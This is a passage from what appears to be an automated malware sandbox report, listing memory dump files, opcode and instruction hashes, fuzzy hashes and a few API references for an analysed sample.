                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 77a4dba2a41e213b57da11383a69cde235e82c58b1ee08f51db821376044cc00
                                              • Instruction ID: 59d8915c8b39eec69512a99e106bb3f7c3b30a0e539da2fb407def733d0c932f
                                              • Opcode Fuzzy Hash: 77a4dba2a41e213b57da11383a69cde235e82c58b1ee08f51db821376044cc00
                                              • Instruction Fuzzy Hash: B9415D716087419BD348DF69D8951ABB7E1EBC4714F10C92DE8A697361EBB8CD088F82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                              • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                              • Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountCurrentProcessTick_snwprintf
                                              • String ID: )3'$)3'
                                              • API String ID: 408895649-986283065
                                              • Opcode ID: 3ced9650d01397d3012b646e898c8b8f03f327870bc82b55d69c7247560587af
                                              • Instruction ID: 294d9abf8ea1a909117623aa828518382cbd568da06a799fd2d99d592e17c74c
                                              • Opcode Fuzzy Hash: 3ced9650d01397d3012b646e898c8b8f03f327870bc82b55d69c7247560587af
                                              • Instruction Fuzzy Hash: 6F41A3707006504BEB64BBF9ECA1BEB27D5DB90354B244A29FA09DB352EE3CCD414B91